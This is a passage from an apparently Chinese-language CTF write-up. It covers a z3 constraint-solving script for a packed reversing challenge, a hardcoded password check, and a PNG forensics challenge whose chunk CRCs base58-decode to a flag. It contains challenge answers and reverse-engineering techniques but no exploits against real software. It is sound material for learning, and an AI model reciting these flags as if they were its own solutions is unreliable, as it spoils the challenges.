Buffer[4]) ^ 0x78 v8[9] = Buffer[11] ^ (Buffer[7] * Buffer[3]) ^ Buffer[23] ^ (Buffer[5] + Buffer[18] + Buffer[21] * Buffer[28] + Buffer[2]) ^ 0xDF v8[10] = (Buffer[11] + Buffer[15] * Buffer[8] + Buffer[5] * Buffer[18] * Buffer[27]) ^ (Buffer[7] + Buffer[21] + Buffer[11] + Buffer[15] - Buffer[26]) ^ 0x11 v8[11] = (Buffer[8] * Buffer[19]) ^ (Buffer[19] - Buffer[13] * Buffer[0] * Buffer[3] - Buffer[15] - Buffer[28]) ^ 0x4D v8[12] = (Buffer[25] * Buffer[3] - Buffer[8] * Buffer[5]) ^ (Buffer[2] * Buffer[11] * Buffer[2] * Buffer[25] + Buffer[24] - Buffer[13] - Buffer[12]) ^ 0x44 v8[13] = (Buffer[19] - Buffer[0] * Buffer[12]) ^ (Buffer[5] + Buffer[15] * Buffer[18] + Buffer[5] + Buffer[28] - Buffer[4] * Buffer[25]) ^ 0xB1 v8[14] = (Buffer[3] + Buffer[17]) ^ (Buffer[7] - Buffer[6]) ^ (Buffer[4] * Buffer[0]) ^ (Buffer[18] + Buffer[10] + Buffer[28] * Buffer[6]- Buffer[14] - Buffer[28]) ^ 0x30 v8[15] = (Buffer[0] - Buffer[0] * Buffer[20]) ^ Buffer[19] ^ (Buffer[0] + Buffer[22] * Buffer[10]) ^ 0x41 v8[16] = (Buffer[0] * Buffer[25] - Buffer[9]) ^ (Buffer[7] + Buffer[4] - Buffer[25] - Buffer[1] - Buffer[12]) ^ 0x39 v8[17] = (Buffer[12] + Buffer[19] + Buffer[16]) ^ (Buffer[12] + Buffer[19]) ^ Buffer[23] ^ (Buffer[8] - Buffer[9]) ^ Buffer[21] ^ (Buffer[20] * Buffer[1]) ^ 0xF5 v8[18] = (Buffer[6] - Buffer[5]) ^ (Buffer[15] + Buffer[3] + Buffer[19] * Buffer[5] - Buffer[21]) ^ (Buffer[27] * Buffer[1] * Buffer[25]) ^ 0x22 v8[19] = (Buffer[5] * Buffer[18] * Buffer[16] * Buffer[5]) ^ Buffer[28] ^ (Buffer[6] + Buffer[1] + Buffer[0]- Buffer[19]) ^ (Buffer[28] - Buffer[18] - Buffer[13]) ^ 0xEC v8[20] = (Buffer[2] + Buffer[10]) ^ (Buffer[19] + Buffer[13] - Buffer[9] * Buffer[4]) ^ Buffer[2] ^ 0x5D v8[21] = (Buffer[11] * Buffer[12] + Buffer[1] * Buffer[19] + Buffer[17] - Buffer[5]) ^ (Buffer[1] + Buffer[18]) ^ 0xA2 v8[22] = (Buffer[24] - Buffer[28] - Buffer[6] * Buffer[21] * Buffer[12]) ^ (Buffer[8] * Buffer[6] - Buffer[16]) ^ 0xE9 v8[23] = (Buffer[11] + Buffer[11] + Buffer[19] * Buffer[7] - Buffer[20] * Buffer[26]) ^ (Buffer[20] * Buffer[1]) ^ 0xB1 v8[24] = (Buffer[12] + Buffer[18] * Buffer[17] + Buffer[24]) ^ (Buffer[16] * Buffer[16] - Buffer[11]) ^ (Buffer[4] + Buffer[23]) ^ 0x38 v8[25] = (Buffer[9] * Buffer[27]) ^ (Buffer[12] - Buffer[5] - Buffer[26] - Buffer[2] * Buffer[19]) ^ Buffer[14] ^ 0x43 v8[26] = (Buffer[6] + Buffer[17] - Buffer[23]) ^ (Buffer[6] + Buffer[2] - Buffer[7] * Buffer[5]) ^ Buffer[6] ^ 0x94 v8[27] = (Buffer[14] + Buffer[5] - Buffer[0] - Buffer[13] - Buffer[18] - Buffer[4]) ^ (Buffer[0] + Buffer[18] - Buffer[24]) ^ 0x63 v8[28] = (Buffer[13] * Buffer[21] * Buffer[9] + Buffer[8] + Buffer[22] + Buffer[13] * Buffer[6] - Buffer[14] - Buffer[16]- Buffer[7]) ^ 0xCD v8[29] = (Buffer[28] - Buffer[16] * Buffer[13] - Buffer[6]) ^ Buffer[8] ^ (Buffer[28] - Buffer[15] - Buffer[7]) ^ (Buffer[22] - Buffer[19]) ^ 0xD9 v8[30] = Buffer[1] ^ (Buffer[16] + Buffer[9] + Buffer[18] + Buffer[5] + Buffer[9] - Buffer[2] - Buffer[8]) ^ (Buffer[0] * Buffer[6]) ^ 0xF6 v8[31] = Buffer[2] ^ (Buffer[14] + Buffer[5] * Buffer[26] * Buffer[16]) ^ (Buffer[25] * Buffer[11] - Buffer[4]) ^ (Buffer[2] - Buffer[15]) ^ 0x78 v8[32] = (Buffer[5] * Buffer[28] * Buffer[17] + Buffer[7] * Buffer[8]) ^ (Buffer[12] + Buffer[23] + Buffer[18] - Buffer[12] * Buffer[20]) ^ Buffer[22] ^ 0x61 v8[33] = (Buffer[2] * Buffer[25] - Buffer[8] * Buffer[2] - Buffer[4] * Buffer[21] * Buffer[1]) ^ 0x18 v8[34] = (Buffer[5] * Buffer[24] + Buffer[24]) ^ (Buffer[10] * Buffer[2] * Buffer[20]) ^ Buffer[18] ^ Buffer[9] ^ 0xE4 v8[35] = Buffer[11] ^ (Buffer[5] - Buffer[5] * Buffer[4] * Buffer[5] * Buffer[12] * Buffer[24]) ^ 0xAE v8[36] = (Buffer[6] + Buffer[12] + Buffer[1] * Buffer[19] - Buffer[23]) ^ Buffer[3] ^ (Buffer[26] - Buffer[16]) ^ 0x6E v8[37] = (Buffer[17] * Buffer[21] + Buffer[26] - Buffer[7] * Buffer[16]) ^ (Buffer[15] - Buffer[26]) ^ 0xC8 v8[38] = (Buffer[11] * Buffer[14]) ^ (Buffer[17] + Buffer[5] + Buffer[17] * Buffer[28] - Buffer[0]) ^ Buffer[3] ^ (Buffer[17] * Buffer[28]) ^ 0xDD v8[39] = (Buffer[9] + Buffer[28] * Buffer[12] + Buffer[25] - Buffer[2]) ^ (Buffer[2] + Buffer[4]) ^ 0xDA v8[40] = Buffer[12] ^ (Buffer[13] + Buffer[18]) ^ (Buffer[15] - Buffer[14]) ^ Buffer[23] ^ (Buffer[28] + Buffer[9]) ^ 0x92 v8[41] = (Buffer[27] - Buffer[6]) ^ Buffer[1] ^ (Buffer[24] + Buffer[7]) ^ (Buffer[27] - Buffer[17] - Buffer[7]) ^ 0xEB v8[42] = (Buffer[12] + Buffer[10] + Buffer[28] - Buffer[4] - Buffer[22] - Buffer[7] - Buffer[2] * Buffer[16] * Buffer[15] - Buffer[1]) ^ (Buffer[1] - Buffer[2]) ^ 0x34 v8[43] = Buffer[5] ^ (Buffer[16] + Buffer[16] + Buffer[23] - Buffer[11]) ^ (Buffer[5] * Buffer[6]) ^ 0x23 v8[44] = (Buffer[3] * Buffer[16] + Buffer[17] + Buffer[14] * Buffer[24] * Buffer[21] * Buffer[13]) ^ 0xEE v8[45] = (Buffer[7] + Buffer[26]) ^ (Buffer[26] - Buffer[2] - Buffer[23]) ^ (Buffer[14] * Buffer[4]) ^ (Buffer[21] - Buffer[12]) ^ 0xD5 v8[46] = Buffer[10] ^ (Buffer[22] + Buffer[8] * Buffer[8] - Buffer[27] * Buffer[3]) ^ (Buffer[0] * Buffer[9] * Buffer[8] - Buffer[24] * Buffer[2]) ^ 0xF0 v8[47] = Buffer[3] ^ (Buffer[9] + Buffer[15] - Buffer[25] - Buffer[12]) ^ Buffer[23] ^ (Buffer[23] + Buffer[6] - Buffer[8]) ^ 0x72 v8[48] = Buffer[11] ^ (Buffer[1] * Buffer[23] + Buffer[6] * Buffer[24] * Buffer[9] * Buffer[13] + Buffer[13]) ^ 0x54 v8[49] = Buffer[2] ^ -(Buffer[19] * Buffer[7]) ^ (Buffer[2] - Buffer[24]) ^ Buffer[20] ^ 0x89 v8[50] = (Buffer[7] * Buffer[26]) ^ (Buffer[3] * Buffer[21]) ^ Buffer[11] ^ (Buffer[1] + Buffer[28]) ^ -Buffer[12] ^ 0xF0 v8[51] = Buffer[0] ^ (Buffer[19] - Buffer[18] - Buffer[3] * Buffer[7]) ^ (Buffer[4] * Buffer[27] + Buffer[7]) ^ Buffer[23] ^ 1 v8[52] = (Buffer[0] * Buffer[21] + Buffer[20] + Buffer[18]) ^ (Buffer[10] + Buffer[13]) ^ Buffer[17] ^ Buffer[0] ^ 0xC9 v8[53] = (Buffer[7] + Buffer[22]) ^ (Buffer[6] + Buffer[18] + Buffer[28] - Buffer[1]) ^ (Buffer[16] * Buffer[15] + Buffer[3] - Buffer[23] * Buffer[5]) ^ 0x74 s = Solver() ''' Text[0] = v8[rand() % 3] Text[2] = v8[rand() % 3 + 6] Text[3] = v8[rand() % 3 + 9] LOBYTE(v15) = v8[rand() % 3 + 24] BYTE1(v14) = v8[17 - rand() % 3] HIBYTE(v14) = v8[rand() % 3 + 21] LOBYTE(v14) = v8[rand() % 3 + 12] BYTE2(v14) = v8[20 - rand() % 3] Text[1] = v8[5 - rand() % 3] HIBYTE(v15) = 0 ''' s.add([v8[0 + 0] == Text[0] , v8[0 + 1] == Text[0] , v8[0 + 2] == Text[0]]) s.add([v8[6 + 0] == Text[2] , v8[6 + 1] == Text[2] , v8[6 + 2] == Text[2]]) s.add([v8[9 + 0] == Text[3] , v8[9 + 1] == Text[3] , v8[9 + 2] == Text[3]]) s.add([v8[24+ 0] == Text[8] , v8[24+ 1] == Text[8] , v8[24+ 2] == Text[8]]) s.add([v8[17- 0] == Text[5] , v8[17- 1] == Text[5] , v8[17- 2] == Text[5]]) s.add([v8[21+ 0] == Text[7] , v8[21+ 1] == Text[7] , v8[21+ 2] == Text[7]]) s.add([v8[12+ 0] == Text[4] , v8[12+ 1] == Text[4] , v8[12+ 2] == Text[4]]) s.add([v8[20- 0] == Text[6] , v8[20- 1] == Text[6] , v8[20- 2] == Text[6]]) s.add([v8[5 - 0] == Text[1] , v8[5 - 1] == Text[1] , v8[5 - 2] == Text[1]]) ''' Caption[0] = v8[rand() % 3 + 27] Caption[1] = v8[rand() % 3 + 30] Caption[2] = v8[rand() % 3 + 33] Caption[3] = v8[rand() % 3 + 36] LOBYTE(v11) = v8[rand() % 3 + 39] BYTE1(v11) = v8[rand() % 3 + 42] BYTE2(v11) = v8[rand() % 3 + 45] HIBYTE(v11) = v8[rand() % 3 + 48] v12 = (unsigned __int8)v8[rand() % 3 + 51] ''' s.add([v8[27 + 0] == Caption[0] , v8[27 + 1] == Caption[0] , v8[27 + 2] == Caption[0]]) s.add([v8[30 + 0] == Caption[1] , v8[30 + 1] == Caption[1] , v8[30 + 2] == Caption[1]]) s.add([v8[33 + 0] == Caption[2] , v8[33 + 1] == Caption[2] , v8[33 + 2] == Caption[2]]) s.add([v8[36 + 0] == Caption[3] , v8[36 + 1] == Caption[3] , v8[36 + 2] == Caption[3]]) s.add([v8[39 + 0] == Caption[4] , v8[39 + 1] == Caption[4] , v8[39 + 2] == Caption[4]]) s.add([v8[42 + 0] == Caption[5] , v8[42 + 1] == Caption[5] , v8[42 + 2] == Caption[5]]) s.add([v8[45 + 0] == Caption[6] , v8[45 + 1] == Caption[6] , v8[45 + 2] == Caption[6]]) s.add([v8[48 + 0] == Caption[7] , v8[48 + 1] == Caption[7] , v8[48 + 2] == Caption[7]]) s.add([v8[51 + 0] == Caption[8] , v8[51 + 1] == Caption[8] , v8[51 + 2] == Caption[8]]) s.check() d = s.model() for i in range(len(Buffer)): print(chr(d[Buffer[i]].as_long()), end='') #Fak3RouTine_Do_turn_FAk3F!aG
- 我感觉这是唯一有点难度的题32位,UPX壳,z3一把梭,但提交不正确不知道哪错了
Swood
int __cdecl main(int argc, const char **argv, const char **envp) { char s1[48]; // [rsp+10h] [rbp-30h] BYREF if ( argc > 1 ) { strcpy(s1, "da39a3ee5e6b4b0d3255bfef95601890afd80709"); if ( !strncmp(s1, argv[1], 0x28uLL) ) { puts("Correect password!"); return 0; } else { puts("Wrong password!"); return 1; } } else { printf("Usage: %s <string>\n", *argv); return 1; } }直接比较就不说啥了,居然正确
Forensic
yhparg
docx
password
- 给出一个图片,010打开发现CRC错,错的CRC正好都是可显示字符
*ERROR: CRC Mismatch @ chunk[2]; in data: 34706869; expected: 608c6056 *ERROR: CRC Mismatch @ chunk[3]; in data: 4b624a4d; expected: fd917212 *ERROR: CRC Mismatch @ chunk[4]; in data: 4d326176; expected: 1887ceca *ERROR: CRC Mismatch @ chunk[5]; in data: 52676b31; expected: d3be40b9 *ERROR: CRC Mismatch @ chunk[6]; in data: 59763645; expected: 2828dec9 *ERROR: CRC Mismatch @ chunk[7]; in data: 71594d70; expected: f3bac867 *ERROR: CRC Mismatch @ chunk[8]; in data: 3143636e; expected: 368fbf8b *ERROR: CRC Mismatch @ chunk[9]; in data: 4e696265; expected: 07df8db0 *ERROR: CRC Mismatch @ chunk[10]; in data: 56756345; expected: 54c5867d *ERROR: CRC Mismatch @ chunk[11]; in data: 59696d7a; expected: 9078d2bd结果再base58
>>> bytes.fromhex('347068694b624a4d4d32617652676b315976364571594d703143636e4e6962655675634559696d7a') b'4phiKbJMM2avRgk1Yv6EqYMp1CcnNibeVucEYimz' #T3N4CI0US{Is_escape_V4ry_Fun}
- 给出一个图片,010打开发现CRC错,错的CRC正好都是可显示字符
key
- 附件需要从谷歌网盘下。